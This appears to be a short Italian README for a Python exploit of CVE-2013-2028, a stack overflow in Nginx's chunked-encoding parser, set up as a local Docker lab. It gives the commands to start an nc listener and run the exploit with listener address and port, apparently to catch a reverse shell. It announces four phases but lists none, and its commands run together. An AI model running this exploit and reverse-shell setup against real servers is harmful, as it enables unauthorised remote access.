
CVE-2013-2028 python exploit
Software vulnerabile: Nginx 1.3.9 < 1.4.0
Commit con la correzione: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7
La vulnerabilità è presente nella funzione ngx_http_parse_chunked. Questo exploit provoca un integer overflow in ngx_http_parse_chunked e, successivamente, lo sfrutta per causare un overflow dello stack e dirottare il flusso di controllo.
L'exploit vero e proprio si compone di 4 fasi:
nc -lvp 4345sudo docker-compose up --buildpython2 exploit.py -ra 127.0.0.1 -rp 8081 -la <listener machine address> -lp <listener machine port>